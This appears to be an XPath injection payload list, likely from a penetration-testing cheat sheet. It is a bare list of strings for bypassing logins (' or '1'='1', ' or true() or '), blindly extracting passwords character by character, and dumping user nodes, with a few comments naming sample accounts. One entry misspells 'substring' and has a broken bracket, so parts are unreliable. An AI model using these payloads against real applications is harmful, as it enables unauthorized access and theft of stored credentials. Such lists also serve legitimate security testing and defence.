')]/child::node() | PseudoTime[contains(PseudoTime,'
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
search=')] | //user/*[contains(*,'
search=Har') and contains(../password,'c
search=Har') and starts-with(../password,'c
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
' or 1]%00
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())
'or string-length(name(.))<10 or' #Select account with length(name)<10
'or contains(name,'adm') or' #Select first account having "adm" in the name
'or contains(.,'adm') or' #Select first account having "adm" in the current value
'or position()=2 or' #Select 2ยบ account
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())
admin' or '
admin' or '1'='2
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())
') or 1=1 or (' 
') or 1=1] | //user/password[('')=('
') or 2=1] | //user/node()[('')=('
')] | //node()[('')=(' 
') or 1=1] | //user/password[('')=('
')] | //./node()[('')=('
')] | //password%00
//user/node()
//user/child::node()
//user[position()=1]/name #pepe
//user[last()-1]/name #mark
//name
//name/node()
//name/child::node()
user/name
user//name
/user/name
//user/name
count(//user/node()) #3*3 = 9 (count all values)
string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
//user[position()=1]/child::node()[position()=2] #peponcio (password)
')]/../*[3][text()!=('
')] | //user/*[1] | a[(' 
')] | //user/*[2] | a[(' 
')] | //user/*[3] | a[(' 
')] | //user/*[4] | a[(' 
